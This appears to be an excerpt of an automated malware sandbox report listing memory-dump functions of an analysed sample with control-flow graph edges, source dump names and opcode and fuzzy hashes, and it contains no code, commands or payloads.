                                                  Function 00007FFAAC51D59A Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID:
                                                  • API String ID: 31276548-0
                                                  • Opcode ID: bb452a4b13ee5a23a42a6a7498c41f312e515b80862a25c11b6b7e8392cbf972
                                                  • Instruction ID: 6366ea9bdd21cb079017e2a6f55cc9909ae69e6a452fab08d83c0b9c6997ece0
                                                  • Opcode Fuzzy Hash: bb452a4b13ee5a23a42a6a7498c41f312e515b80862a25c11b6b7e8392cbf972
                                                  • Instruction Fuzzy Hash: CB417270908A4C8FEB99EF58D849BEDBBF5FB56310F10416AD04ED7252DA34A849CF40
                                                  Function 00007FFAAC521D55 Relevance: .7, Instructions: 702COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 556aa82f8ff9bec6176f8b28343a800987eb34db8942b411e9ce8511e3472a88
                                                  • Instruction ID: 3557ecc17637fe0643124bddd9326516b16f1b0f026ede145fc0be71dca324fd
                                                  • Opcode Fuzzy Hash: 556aa82f8ff9bec6176f8b28343a800987eb34db8942b411e9ce8511e3472a88
                                                  • Instruction Fuzzy Hash: 44523A7090962ECFEB58DF14C494BF977B2FF59304F50856DE00E97292CA38A986CB80
                                                  Function 00007FFAAC6ECDB2 Relevance: 4.1, Strings: 3, Instructions: 328COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1044 7ffaac6ecdb2-7ffaac6ecdb9 1045 7ffaac6ecfd5-7ffaac6ecfe6 1044->1045 1046 7ffaac6ecdbf-7ffaac6ecdf1 call 7ffaac6ecb50 call 7ffaac6eca20 1044->1046 1048 7ffaac6ecfe8 1045->1048 1049 7ffaac6ecfed-7ffaac6ecff8 1045->1049 1046->1045 1053 7ffaac6ecdf7-7ffaac6ece49 call 7ffaac6ecb50 call 7ffaac6eca20 1046->1053 1048->1049 1053->1045 1061 7ffaac6ece4f-7ffaac6ece94 call 7ffaac6ecb50 1053->1061 1067 7ffaac6ece96-7ffaac6eceaa call 7ffaac6eca20 1061->1067 1068 7ffaac6ecf04-7ffaac6ecf40 call 7ffaac6e9580 1061->1068 1067->1045 1074 7ffaac6eceb0-7ffaac6eced3 call 7ffaac6ecb50 1067->1074 1080 7ffaac6ecf79-7ffaac6ecf80 call 7ffaac6e93b0 1068->1080 1078 7ffaac6eced9-7ffaac6ecee9 1074->1078 1079 7ffaac6ed0a5-7ffaac6ed0bc 1074->1079 1078->1079 1081 7ffaac6eceef-7ffaac6ecf02 1078->1081 1085 7ffaac6ed0be 1079->1085 1086 7ffaac6ed0bf-7ffaac6ed0cd 1079->1086 1084 7ffaac6ecf85-7ffaac6ecf8a 1080->1084 1081->1067 1081->1068 1087 7ffaac6ecf42-7ffaac6ecf62 1084->1087 1088 7ffaac6ecf8c-7ffaac6ecf8e 1084->1088 1085->1086 1091 7ffaac6ed0d5 1086->1091 1092 7ffaac6ed0cf 1086->1092 1087->1079 1090 7ffaac6ecf68-7ffaac6ecf73 1087->1090 1088->1045 1089 7ffaac6ecf90-7ffaac6ecf93 1088->1089 1093 7ffaac6ecf99-7ffaac6ecfb4 1089->1093 1094 7ffaac6ecf95 1089->1094 1090->1080 1097 7ffaac6ed05b-7ffaac6ed06f 1090->1097 1095 7ffaac6ed0d9-7ffaac6ed0ea 1091->1095 1096 7ffaac6ed0d7 1091->1096 1092->1091 1093->1079 1099 7ffaac6ecfba-7ffaac6ecfd3 call 7ffaac6eca20 1093->1099 1094->1093 1100 7ffaac6ed098-7ffaac6ed09c 1095->1100 1101 7ffaac6ed0ec-7ffaac6ed118 1095->1101 1096->1095 1098 7ffaac6ed119 1096->1098 1102 7ffaac6ed076-7ffaac6ed081 1097->1102 1103 7ffaac6ed071 1097->1103 1106 7ffaac6ed11a-7ffaac6ed35a 1098->1106 1099->1045 1108 7ffaac6ecff9-7ffaac6ed012 call 7ffaac6ecb50 1099->1108 1100->1079 1101->1098 1101->1106 1103->1102 1108->1079 1113 7ffaac6ed018-7ffaac6ed01f 1108->1113 1114 7ffaac6ed049-7ffaac6ed051 1113->1114 1115 7ffaac6ed053-7ffaac6ed059 1114->1115 1116 7ffaac6ed021-7ffaac6ed03d 1114->1116 1115->1097 1117 7ffaac6ed082 1115->1117 1116->1079 1118 7ffaac6ed03f-7ffaac6ed047 1116->1118 1117->1100 1118->1114
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6$r6
                                                  • API String ID: 0-701349563
                                                  • Opcode ID: c92f3a2fe5f48d7a9435d2c79392b5d0bcdcd4edab03a8b4e7d66de951d0e202
                                                  • Instruction ID: 204b34f6f306c262d3b69406658c8ce46b44c2ffb9b276a7ffc7e3b165bbc424
                                                  • Opcode Fuzzy Hash: c92f3a2fe5f48d7a9435d2c79392b5d0bcdcd4edab03a8b4e7d66de951d0e202
                                                  • Instruction Fuzzy Hash: 5CC1C670619A469FF74ADF28C0916A47BA1FF56310F54A17AD04ECBA86CB38F855CBC0
                                                  Function 00007FFAACAAB002 Relevance: 4.1, Strings: 3, Instructions: 326COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1119 7ffaacaab002-7ffaacaab009 1120 7ffaacaab225-7ffaacaab236 1119->1120 1121 7ffaacaab00f-7ffaacaab041 call 7ffaacaaada0 call 7ffaacaaac70 1119->1121 1123 7ffaacaab238 1120->1123 1124 7ffaacaab23d-7ffaacaab248 1120->1124 1121->1120 1128 7ffaacaab047-7ffaacaab062 call 7ffaacaaada0 1121->1128 1123->1124 1131 7ffaacaab063-7ffaacaab06e 1128->1131 1133 7ffaacaab070-7ffaacaab099 call 7ffaacaaac70 1131->1133 1133->1120 1137 7ffaacaab09f-7ffaacaab0e4 call 7ffaacaaada0 1133->1137 1143 7ffaacaab154-7ffaacaab190 call 7ffaacaa78b0 1137->1143 1144 7ffaacaab0e6-7ffaacaab0fa call 7ffaacaaac70 1137->1144 1154 7ffaacaab1c9-7ffaacaab1d0 call 7ffaacaa7650 1143->1154 1144->1120 1150 7ffaacaab100-7ffaacaab123 call 7ffaacaaada0 1144->1150 1155 7ffaacaab2f5-7ffaacaab30c 1150->1155 1156 7ffaacaab129-7ffaacaab139 1150->1156 1160 7ffaacaab1d5-7ffaacaab1da 1154->1160 1161 7ffaacaab30e 1155->1161 1162 7ffaacaab30f-7ffaacaab31d 1155->1162 1156->1155 1158 7ffaacaab13f-7ffaacaab152 1156->1158 1158->1143 1158->1144 1163 7ffaacaab192-7ffaacaab1b2 1160->1163 1164 7ffaacaab1dc-7ffaacaab1de 1160->1164 1161->1162 1166 7ffaacaab325 1162->1166 1167 7ffaacaab31f 1162->1167 1163->1155 1165 7ffaacaab1b8-7ffaacaab1c3 1163->1165 1164->1120 1168 7ffaacaab1e0-7ffaacaab1e3 1164->1168 1165->1154 1169 7ffaacaab2ab-7ffaacaab2bf 1165->1169 1170 7ffaacaab329-7ffaacaab368 1166->1170 1171 7ffaacaab327 1166->1171 1167->1166 1172 7ffaacaab1e5 1168->1172 1173 7ffaacaab1e9-7ffaacaab204 1168->1173 1176 7ffaacaab2c6-7ffaacaab2d1 1169->1176 1177 7ffaacaab2c1 1169->1177 1174 7ffaacaab369 1170->1174 1179 7ffaacaab36a-7ffaacaab5aa 1170->1179 1171->1170 1171->1174 1172->1173 1173->1155 1178 7ffaacaab20a-7ffaacaab223 call 7ffaacaaac70 1173->1178 1174->1179 1177->1176 1178->1120 1183 7ffaacaab249-7ffaacaab262 call 7ffaacaaada0 1178->1183 1183->1155 1187 7ffaacaab268-7ffaacaab26f 1183->1187 1188 7ffaacaab299-7ffaacaab2a1 1187->1188 1189 7ffaacaab2a3-7ffaacaab2a9 1188->1189 1190 7ffaacaab271-7ffaacaab28d 1188->1190 1189->1169 1192 7ffaacaab2d2 1189->1192 1190->1155 1191 7ffaacaab28f-7ffaacaab297 1190->1191 1191->1188 1192->1155
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6$r6
                                                  • API String ID: 0-701349563
                                                  • Opcode ID: 6a00856ab08d1946b8ac419cb4b99951a125e3f4f6f427f554d8c34960e599f3
                                                  • Instruction ID: fce7aa25fae760927dccc7f7c09fd5e7c67e659428161ab75832d2305f4c7b04
                                                  • Opcode Fuzzy Hash: 6a00856ab08d1946b8ac419cb4b99951a125e3f4f6f427f554d8c34960e599f3
                                                  • Instruction Fuzzy Hash: 93C1C531519A469FF749DB28E0516B4B7A2FF56700F94C17AC04EC7A86EB28F855CBC0
                                                  Function 00007FFAACAABAE0 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1315 7ffaacaabae0-7ffaacaabaee 1316 7ffaacaabaf0 1315->1316 1317 7ffaacaabafb-7ffaacaabb91 1316->1317 1320 7ffaacaabb16-7ffaacaabb96 1317->1320 1321 7ffaacaabb9c-7ffaacaabbdf 1317->1321 1320->1321 1325 7ffaacaabb38-7ffaacaabb98 1320->1325 1329 7ffaacaabbe1-7ffaacaabc36 1321->1329 1325->1321 1332 7ffaacaabb5c-7ffaacaabb9a 1325->1332 1339 7ffaacaabc41-7ffaacaabce7 1329->1339 1332->1321 1336 7ffaacaabb7d-7ffaacaabb90 1332->1336 1351 7ffaacaabe17-7ffaacaabe34 1339->1351 1352 7ffaacaabced-7ffaacaac090 1339->1352 1353 7ffaacaabe3a-7ffaacaabe3f 1351->1353 1354 7ffaacaac141-7ffaacaac1a8 1351->1354 1357 7ffaacaac0fe-7ffaacaac118 1352->1357 1356 7ffaacaabe42-7ffaacaabe49 1353->1356 1366 7ffaacaac318 1354->1366 1358 7ffaacaabdcc-7ffaacaac139 1356->1358 1359 7ffaacaabe4b-7ffaacaabe4f 1356->1359 1358->1354 1359->1329 1362 7ffaacaabe55 1359->1362 1365 7ffaacaabed3-7ffaacaabed6 1362->1365 1367 7ffaacaabed9-7ffaacaabee0 1365->1367 1366->1366 1368 7ffaacaabee6 1367->1368 1369 7ffaacaabe57-7ffaacaabe8c call 7ffaacaabae0 1367->1369 1370 7ffaacaabf56-7ffaacaabf5d 1368->1370 1369->1354 1376 7ffaacaabe92-7ffaacaabea2 1369->1376 1372 7ffaacaabee8-7ffaacaabf1a call 7ffaacaabae0 1370->1372 1373 7ffaacaabf5f-7ffaacaabfa5 1370->1373 1372->1354 1382 7ffaacaabf20-7ffaacaabf48 1372->1382 1388 7ffaacaabd74-7ffaacaabd78 1373->1388 1389 7ffaacaabfab-7ffaacaabfb0 1373->1389 1376->1329 1378 7ffaacaabea8-7ffaacaabec5 1376->1378 1378->1354 1381 7ffaacaabecb-7ffaacaabed0 1378->1381 1381->1365 1382->1354 1383 7ffaacaabf4e-7ffaacaabf53 1382->1383 1383->1370 1390 7ffaacaabdca 1388->1390 1391 7ffaacaabd7a-7ffaacaabd97 1388->1391 1392 7ffaacaac036-7ffaacaac03a 1389->1392 1390->1356 1391->1357 1393 7ffaacaabfb5-7ffaacaabfe4 call 7ffaacaabae0 1392->1393 1394 7ffaacaac040-7ffaacaac046 1392->1394 1393->1354 1397 7ffaacaabfea-7ffaacaabffa 1393->1397 1397->1339 1398 7ffaacaac000-7ffaacaac00f 1397->1398 1398->1354 1399 7ffaacaac015-7ffaacaac028 1398->1399 1399->1367 1400 7ffaacaac02e-7ffaacaac033 1399->1400 1400->1392
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$r6$r6
                                                  • API String ID: 0-3183416175
                                                  • Opcode ID: 1daf3fbc2c5e1b202f9bc4308aa0bb36a5a3b2d09b6f5c5b5ac8095330004bbc
                                                  • Instruction ID: 867405952f8dbedb3ffec4e19f349b1b71a82a8a6f6fa728352596fc0bcc5547
                                                  • Opcode Fuzzy Hash: 1daf3fbc2c5e1b202f9bc4308aa0bb36a5a3b2d09b6f5c5b5ac8095330004bbc
                                                  • Instruction Fuzzy Hash: 59510831D2C55ACEFBA89B18E455AF477A2FF55700F90C1B9D04FC7586EE28A84487C1
                                                  Function 00007FFAAC6EB210 Relevance: 3.2, Strings: 2, Instructions: 679COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1532 7ffaac6eb210-7ffaac6eb22a 1533 7ffaac6eb230-7ffaac6eb240 1532->1533 1534 7ffaac6eb82c-7ffaac6eb850 1532->1534 1535 7ffaac6eb246-7ffaac6eb281 1533->1535 1536 7ffaac6eb88a-7ffaac6eb8a0 1533->1536 1539 7ffaac6eb31a-7ffaac6eb322 1535->1539 1540 7ffaac6eb8a2-7ffaac6eb8c6 1536->1540 1541 7ffaac6eb8ea-7ffaac6eb8fd 1536->1541 1542 7ffaac6eb328 1539->1542 1543 7ffaac6eb286-7ffaac6eb28f 1539->1543 1545 7ffaac6eb332-7ffaac6eb367 1542->1545 1543->1536 1544 7ffaac6eb295-7ffaac6eb2a0 1543->1544 1546 7ffaac6eb2a6-7ffaac6eb2ba 1544->1546 1547 7ffaac6eb32a-7ffaac6eb32e 1544->1547 1555 7ffaac6eb369-7ffaac6eb37e 1545->1555 1556 7ffaac6eb380-7ffaac6eb38f 1545->1556 1549 7ffaac6eb313-7ffaac6eb317 1546->1549 1550 7ffaac6eb2bc-7ffaac6eb2d3 1546->1550 1547->1545 1549->1539 1550->1536 1551 7ffaac6eb2d9-7ffaac6eb2e5 1550->1551 1553 7ffaac6eb2e7-7ffaac6eb2fb 1551->1553 1554 7ffaac6eb2ff-7ffaac6eb310 1551->1554 1553->1550 1557 7ffaac6eb2fd 1553->1557 1554->1549 1555->1556 1561 7ffaac6eb3b1-7ffaac6eb3f5 1556->1561 1562 7ffaac6eb391-7ffaac6eb3ac 1556->1562 1557->1549 1571 7ffaac6eb3f7-7ffaac6eb41e 1561->1571 1572 7ffaac6eb431-7ffaac6eb433 1561->1572 1568 7ffaac6eb7e9-7ffaac6eb81a 1562->1568 1576 7ffaac6eb81c-7ffaac6eb826 1568->1576 1577 7ffaac6eb420-7ffaac6eb430 1571->1577 1578 7ffaac6eb46f-7ffaac6eb483 1571->1578 1572->1536 1573 7ffaac6eb439-7ffaac6eb467 1572->1573 1584 7ffaac6eb468-7ffaac6eb46d 1573->1584 1576->1533 1576->1534 1577->1572 1581 7ffaac6eb4b4-7ffaac6eb4b6 1578->1581 1582 7ffaac6eb485-7ffaac6eb4b3 1578->1582 1587 7ffaac6eb4ba-7ffaac6eb4c0 1581->1587 1582->1581 1584->1577 1585 7ffaac6eb46e 1584->1585 1585->1578 1588 7ffaac6eb4ca-7ffaac6eb4db 1587->1588 1589 7ffaac6eb54c-7ffaac6eb55d 1588->1589 1590 7ffaac6eb4dd-7ffaac6eb4e1 1588->1590 1591 7ffaac6eb55e-7ffaac6eb561 1589->1591 1590->1584 1593 7ffaac6eb4e3 1590->1593 1594 7ffaac6eb567-7ffaac6eb56b 1591->1594 1595 7ffaac6eb50c-7ffaac6eb51d 1593->1595 1596 7ffaac6eb56d-7ffaac6eb56f 1594->1596 1595->1594 1600 7ffaac6eb51f-7ffaac6eb52d 1595->1600 1598 7ffaac6eb5b9-7ffaac6eb5c1 1596->1598 1599 7ffaac6eb571-7ffaac6eb57f 1596->1599 1601 7ffaac6eb5c3-7ffaac6eb5cc 1598->1601 1602 7ffaac6eb60b-7ffaac6eb613 1598->1602 1603 7ffaac6eb5f0-7ffaac6eb605 1599->1603 1604 7ffaac6eb581-7ffaac6eb585 1599->1604 1605 7ffaac6eb59e-7ffaac6eb5b3 1600->1605 1606 7ffaac6eb52f-7ffaac6eb533 1600->1606 1607 7ffaac6eb5cf-7ffaac6eb5d1 1601->1607 1609 7ffaac6eb619-7ffaac6eb632 1602->1609 1610 7ffaac6eb69b-7ffaac6eb6a9 1602->1610 1603->1602 1604->1595 1614 7ffaac6eb587 1604->1614 1605->1598 1606->1587 1622 7ffaac6eb535 1606->1622 1612 7ffaac6eb642-7ffaac6eb644 1607->1612 1613 7ffaac6eb5d3-7ffaac6eb5d5 1607->1613 1609->1610 1615 7ffaac6eb634-7ffaac6eb635 1609->1615 1616 7ffaac6eb71a-7ffaac6eb71b 1610->1616 1617 7ffaac6eb6ab-7ffaac6eb6ad 1610->1617 1629 7ffaac6eb645-7ffaac6eb647 1612->1629 1623 7ffaac6eb5d7 1613->1623 1624 7ffaac6eb651-7ffaac6eb655 1613->1624 1614->1605 1618 7ffaac6eb636-7ffaac6eb640 1615->1618 1625 7ffaac6eb74b-7ffaac6eb74d 1616->1625 1619 7ffaac6eb729-7ffaac6eb72b 1617->1619 1620 7ffaac6eb6af 1617->1620 1618->1612 1626 7ffaac6eb79c 1619->1626 1627 7ffaac6eb72d-7ffaac6eb72f 1619->1627 1620->1618 1628 7ffaac6eb6b1 1620->1628 1622->1589 1623->1591 1630 7ffaac6eb5d9 1623->1630 1631 7ffaac6eb657 1624->1631 1632 7ffaac6eb6d1-7ffaac6eb6eb 1624->1632 1633 7ffaac6eb7be-7ffaac6eb7e7 1625->1633 1634 7ffaac6eb74f 1625->1634 1643 7ffaac6eb79e-7ffaac6eb7a0 1626->1643 1644 7ffaac6eb80d-7ffaac6eb81a 1626->1644 1635 7ffaac6eb731 1627->1635 1636 7ffaac6eb7ab-7ffaac6eb7af 1627->1636 1637 7ffaac6eb6b8-7ffaac6eb6bc 1628->1637 1651 7ffaac6eb6c8-7ffaac6eb6d0 1629->1651 1652 7ffaac6eb648 1629->1652 1639 7ffaac6eb5de-7ffaac6eb5e4 1630->1639 1631->1639 1641 7ffaac6eb659 1631->1641 1665 7ffaac6eb71d-7ffaac6eb726 1632->1665 1666 7ffaac6eb6ed-7ffaac6eb6fb 1632->1666 1633->1568 1642 7ffaac6eb76c-7ffaac6eb77a 1634->1642 1635->1637 1646 7ffaac6eb733 1635->1646 1647 7ffaac6eb7b1 1636->1647 1648 7ffaac6eb82b 1636->1648 1649 7ffaac6eb738-7ffaac6eb73e 1637->1649 1650 7ffaac6eb6be 1637->1650 1655 7ffaac6eb660-7ffaac6eb685 1639->1655 1664 7ffaac6eb5e6 1639->1664 1641->1655 1656 7ffaac6eb77b-7ffaac6eb785 1642->1656 1643->1576 1645 7ffaac6eb7a2 1643->1645 1644->1576 1645->1619 1660 7ffaac6eb7a4 1645->1660 1646->1649 1647->1649 1662 7ffaac6eb7b3 1647->1662 1648->1534 1667 7ffaac6eb740 1649->1667 1668 7ffaac6eb7ba-7ffaac6eb7bd 1649->1668 1650->1629 1663 7ffaac6eb6c0 1650->1663 1651->1632 1652->1607 1658 7ffaac6eb649-7ffaac6eb64a 1652->1658 1673 7ffaac6eb688-7ffaac6eb699 1655->1673 1659 7ffaac6eb787-7ffaac6eb79a 1656->1659 1658->1624 1659->1626 1660->1636 1662->1668 1663->1651 1664->1596 1669 7ffaac6eb5e8 1664->1669 1665->1619 1666->1642 1670 7ffaac6eb6fd-7ffaac6eb6ff 1666->1670 1667->1659 1672 7ffaac6eb742-7ffaac6eb74a 1667->1672 1668->1633 1669->1603 1670->1656 1675 7ffaac6eb701 1670->1675 1672->1625 1673->1610 1673->1615 1675->1673 1676 7ffaac6eb703 1675->1676 1676->1616
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
                                                  • Opcode ID: a2f035654b3df88ea0bc0fe8e0c5415a3d17f67dcde5a1af32038bb8d5a4e77c
                                                  • Instruction ID: dab98725baf27e082daab5e3cdd639edf286b1d0590856912c1a35145f09d456
                                                  • Opcode Fuzzy Hash: a2f035654b3df88ea0bc0fe8e0c5415a3d17f67dcde5a1af32038bb8d5a4e77c
                                                  • Instruction Fuzzy Hash: CB22A630A19A19CFEB99DB18C895A6973E1FF95310F5091BAE00EC7292DF24EC45CB84
                                                  Function 00007FFAAC6E2820 Relevance: 3.2, Strings: 2, Instructions: 665COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1677 7ffaac6e2820-7ffaac6e283a 1678 7ffaac6e2840-7ffaac6e2850 1677->1678 1679 7ffaac6e2e3c-7ffaac6e2e4d 1677->1679 1680 7ffaac6e2856-7ffaac6e2891 1678->1680 1681 7ffaac6e2e9a-7ffaac6e2eb0 1678->1681 1684 7ffaac6e292a-7ffaac6e2932 1680->1684 1685 7ffaac6e2eb2-7ffaac6e2ed6 1681->1685 1686 7ffaac6e2efa-7ffaac6e2f0d 1681->1686 1687 7ffaac6e2896-7ffaac6e289f 1684->1687 1688 7ffaac6e2938 1684->1688 1687->1681 1689 7ffaac6e28a5-7ffaac6e28b0 1687->1689 1690 7ffaac6e2942-7ffaac6e2977 1688->1690 1691 7ffaac6e28b6-7ffaac6e28ca 1689->1691 1692 7ffaac6e293a-7ffaac6e293e 1689->1692 1700 7ffaac6e2979-7ffaac6e298e 1690->1700 1701 7ffaac6e2990-7ffaac6e299f 1690->1701 1693 7ffaac6e2923-7ffaac6e2927 1691->1693 1694 7ffaac6e28cc-7ffaac6e28e3 1691->1694 1692->1690 1693->1684 1694->1681 1696 7ffaac6e28e9-7ffaac6e28f5 1694->1696 1698 7ffaac6e28f7-7ffaac6e290b 1696->1698 1699 7ffaac6e290f-7ffaac6e2920 1696->1699 1698->1694 1702 7ffaac6e290d 1698->1702 1699->1693 1700->1701 1706 7ffaac6e29c1-7ffaac6e2a2e 1701->1706 1707 7ffaac6e29a1-7ffaac6e29bc 1701->1707 1702->1693 1716 7ffaac6e2a7f-7ffaac6e2ac6 1706->1716 1717 7ffaac6e2a30-7ffaac6e2a43 1706->1717 1713 7ffaac6e2df9-7ffaac6e2e2a 1707->1713 1722 7ffaac6e2e2c-7ffaac6e2e36 1713->1722 1727 7ffaac6e2aca-7ffaac6e2aeb 1716->1727 1717->1681 1718 7ffaac6e2a49-7ffaac6e2a77 1717->1718 1726 7ffaac6e2a78-7ffaac6e2a7d 1718->1726 1722->1678 1722->1679 1726->1717 1728 7ffaac6e2a7e 1726->1728 1730 7ffaac6e2aed-7ffaac6e2af1 1727->1730 1731 7ffaac6e2b5c-7ffaac6e2b6d 1727->1731 1728->1716 1730->1726 1734 7ffaac6e2af3 1730->1734 1732 7ffaac6e2b6e-7ffaac6e2b71 1731->1732 1735 7ffaac6e2b77-7ffaac6e2b7b 1732->1735 1736 7ffaac6e2b1c-7ffaac6e2b2d 1734->1736 1737 7ffaac6e2b7d-7ffaac6e2b7f 1735->1737 1736->1735 1745 7ffaac6e2b2f-7ffaac6e2b3d 1736->1745 1738 7ffaac6e2bc9-7ffaac6e2bd1 1737->1738 1739 7ffaac6e2b81-7ffaac6e2b8f 1737->1739 1743 7ffaac6e2bd3-7ffaac6e2bdc 1738->1743 1744 7ffaac6e2c1b-7ffaac6e2c23 1738->1744 1741 7ffaac6e2b91-7ffaac6e2b95 1739->1741 1742 7ffaac6e2c00-7ffaac6e2c15 1739->1742 1741->1736 1752 7ffaac6e2b97 1741->1752 1742->1744 1749 7ffaac6e2bdf-7ffaac6e2be1 1743->1749 1747 7ffaac6e2c29-7ffaac6e2c42 1744->1747 1748 7ffaac6e2cab-7ffaac6e2cb9 1744->1748 1750 7ffaac6e2b3f-7ffaac6e2b43 1745->1750 1751 7ffaac6e2bae-7ffaac6e2bc3 1745->1751 1747->1748 1753 7ffaac6e2c44-7ffaac6e2c45 1747->1753 1754 7ffaac6e2cbb-7ffaac6e2cbd 1748->1754 1755 7ffaac6e2d2a-7ffaac6e2d2b 1748->1755 1756 7ffaac6e2be3-7ffaac6e2be5 1749->1756 1757 7ffaac6e2c52-7ffaac6e2c54 1749->1757 1750->1727 1761 7ffaac6e2b45 1750->1761 1751->1738 1752->1751 1763 7ffaac6e2c46-7ffaac6e2c50 1753->1763 1764 7ffaac6e2d39-7ffaac6e2d3b 1754->1764 1765 7ffaac6e2cbf 1754->1765 1762 7ffaac6e2d5b-7ffaac6e2d5d 1755->1762 1759 7ffaac6e2be7 1756->1759 1760 7ffaac6e2c61-7ffaac6e2c65 1756->1760 1775 7ffaac6e2c55-7ffaac6e2c57 1757->1775 1759->1732 1767 7ffaac6e2be9 1759->1767 1770 7ffaac6e2c67 1760->1770 1771 7ffaac6e2ce1-7ffaac6e2ced 1760->1771 1761->1731 1768 7ffaac6e2d5f 1762->1768 1769 7ffaac6e2dce-7ffaac6e2de0 1762->1769 1763->1757 1772 7ffaac6e2d3d-7ffaac6e2d3f 1764->1772 1773 7ffaac6e2dac 1764->1773 1765->1763 1774 7ffaac6e2cc1 1765->1774 1777 7ffaac6e2bee-7ffaac6e2bf4 1767->1777 1778 7ffaac6e2d7c-7ffaac6e2d8a 1768->1778 1776 7ffaac6e2de6-7ffaac6e2de8 1769->1776 1770->1777 1780 7ffaac6e2c69 1770->1780 1779 7ffaac6e2cf3-7ffaac6e2cfb 1771->1779 1783 7ffaac6e2d41 1772->1783 1784 7ffaac6e2dbb-7ffaac6e2dbf 1772->1784 1781 7ffaac6e2dae-7ffaac6e2db0 1773->1781 1782 7ffaac6e2e1d-7ffaac6e2e2a 1773->1782 1785 7ffaac6e2cc8-7ffaac6e2ccc 1774->1785 1787 7ffaac6e2cd8-7ffaac6e2ce0 1775->1787 1788 7ffaac6e2c58 1775->1788 1799 7ffaac6e2dea-7ffaac6e2deb 1776->1799 1790 7ffaac6e2c70-7ffaac6e2c95 1777->1790 1807 7ffaac6e2bf6 1777->1807 1789 7ffaac6e2d8b-7ffaac6e2d95 1778->1789 1796 7ffaac6e2d2d-7ffaac6e2d36 1779->1796 1797 7ffaac6e2cfd-7ffaac6e2d0b 1779->1797 1780->1790 1781->1722 1791 7ffaac6e2db2 1781->1791 1782->1722 1783->1785 1800 7ffaac6e2d43 1783->1800 1792 7ffaac6e2dc1 1784->1792 1793 7ffaac6e2e3b 1784->1793 1794 7ffaac6e2d48-7ffaac6e2d4e 1785->1794 1795 7ffaac6e2cce 1785->1795 1787->1771 1788->1749 1801 7ffaac6e2c59-7ffaac6e2c5a 1788->1801 1802 7ffaac6e2d97-7ffaac6e2daa 1789->1802 1816 7ffaac6e2c98-7ffaac6e2ca9 1790->1816 1791->1764 1803 7ffaac6e2db4 1791->1803 1792->1794 1804 7ffaac6e2dc3 1792->1804 1793->1679 1811 7ffaac6e2dca-7ffaac6e2dcd 1794->1811 1814 7ffaac6e2d50 1794->1814 1795->1775 1805 7ffaac6e2cd0 1795->1805 1796->1764 1797->1778 1806 7ffaac6e2d0d-7ffaac6e2d0f 1797->1806 1810 7ffaac6e2df6-7ffaac6e2df7 1799->1810 1800->1794 1801->1760 1802->1773 1803->1784 1804->1811 1805->1787 1806->1789 1812 7ffaac6e2d11 1806->1812 1807->1737 1813 7ffaac6e2bf8 1807->1813 1810->1713 1811->1769 1812->1816 1817 7ffaac6e2d13-7ffaac6e2d65 1812->1817 1813->1742 1814->1802 1818 7ffaac6e2d52-7ffaac6e2d5a 1814->1818 1816->1748 1816->1753 1820 7ffaac6e2d67 1817->1820 1821 7ffaac6e2de1-7ffaac6e2de2 1817->1821 1818->1762 1822 7ffaac6e2d69 1820->1822 1823 7ffaac6e2cee-7ffaac6e2cef 1820->1823 1821->1776 1822->1821 1823->1779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
